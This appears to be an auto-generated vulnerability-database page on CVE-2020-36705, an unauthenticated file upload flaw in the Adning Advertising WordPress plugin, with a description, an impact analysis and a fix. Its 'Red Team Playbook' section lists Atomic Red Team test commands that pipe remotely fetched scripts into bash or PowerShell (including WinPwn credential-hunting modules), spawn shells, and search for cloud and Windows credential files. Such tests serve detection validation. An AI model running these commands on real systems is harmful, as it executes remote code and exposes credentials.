CVE-2020-36705
Overview
This vulnerability is an arbitrary file upload flaw caused by insufficient validation of file types in the _ning_upload_image function of the Adning Advertising WordPress plugin. The root cause lies in the absence of proper sanitization and restriction on uploaded file extensions or MIME types within this specific image upload handler. The affected component is the file upload mechanism in versions up to and including 1.5.5 of the plugin.
Vulnerability Description
The Adning Advertising plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the _ning_upload_image function in versions up to, and including, 1.5.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.
Impact
An unauthenticated attacker can exploit this flaw to upload malicious files, potentially leading to remote code execution on the affected server. Since no authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), the attacker can gain unauthorized control over the site environment. This may result in data breaches, defacement, or full system compromise, severely impacting the confidentiality, integrity, and availability of the affected WordPress installation.
Solution
Users of the tunafish Adning Advertising plugin should upgrade to version 1.5.6 or later, where proper file type validation has been implemented. Detailed patch instructions and advisories are available at the Wordfence threat intelligence page (https://www.wordfence.com/threat-intel/vulnerabilities/id/4a263b74-e9ae-4fd2-be9b-9b8e9eee5982). No official workarounds are recommended; immediate updating is advised to mitigate exploitation risks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Adning Advertising plugin for WordPress stems from inadequate file type validation within the _ning_upload_image function. This oversight allows unauthenticated users to upload files without proper restrictions, potentially leading to the execution of arbitrary code on the server. The lack of stringent checks on the file types being uploaded means that an attacker could exploit this weakness to upload malicious scripts disguised as legitimate files, such as images or documents. This flaw is particularly concerning as it exists in versions up to and including 1.5.5, which many users may still be operating, leaving them exposed to significant risks.
Attack vectors for this vulnerability are straightforward yet highly effective. An attacker could leverage a simple web request to upload a malicious file to the server, bypassing any authentication mechanisms. Once the file is successfully uploaded, the attacker can execute it, gaining control over the server or accessing sensitive data. Scenarios may include uploading a PHP shell, which would allow the attacker to execute arbitrary commands on the server, manipulate files, or even pivot to other systems within the network. The ease of exploitation, combined with the potential for severe consequences, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be profound, especially for businesses relying on WordPress for their online presence. Successful exploitation could lead to unauthorized access to sensitive data, defacement of websites, or even the complete takeover of the affected server. The financial implications could be significant, including costs associated with incident response, legal liabilities, and damage to reputation. Furthermore, if the compromised server is part of a larger network, the attacker could use it as a launchpad for further attacks, amplifying the risk and potential damage to the organization.
To detect and mitigate this vulnerability, organizations should implement several strategies. First and foremost, it is crucial to update the Adning Advertising plugin to the latest version, where this vulnerability has been addressed. Regularly reviewing and updating all plugins and themes is essential to maintaining a secure WordPress environment. Additionally, employing a web application firewall (WAF) can help filter out malicious requests and prevent unauthorized file uploads. Monitoring server logs for unusual activity can also aid in early detection of exploitation attempts. Finally, implementing strict file type validation and access controls on file upload functionalities can significantly reduce the risk of similar vulnerabilities being exploited in the future.
In conclusion, the vulnerability within the Adning Advertising plugin represents a critical security risk that can lead to severe consequences for affected organizations. The combination of easy exploitation and high potential impact necessitates immediate action from users of the plugin. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can protect themselves from the threats posed by this vulnerability and enhance their overall cybersecurity posture.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tunasite | Adning Advertising | All |
cpe:2.3:a:tunasite:adning_advertising:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-36705 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/4a263b74-e9ae-4fd2-be9b-9b8e9eee5982?source=cve |
| codecanyon.net |
GitHub CVE
|
https://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693 |
| blog.nintechnet.com |
GitHub CVE
|
https://blog.nintechnet.com/critical-vulnerability-in-adning-advertising-plugin-actively-exploited-in-the-wild/ |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/blog/2020/07/critical-vulnerabilities-patched-in-adning-advertising-plugin/ |
| wpscan.com |
GitHub CVE
|
https://wpscan.com/vulnerability/e9873fe3-fc06-4a52-aa32-6922cab7830c |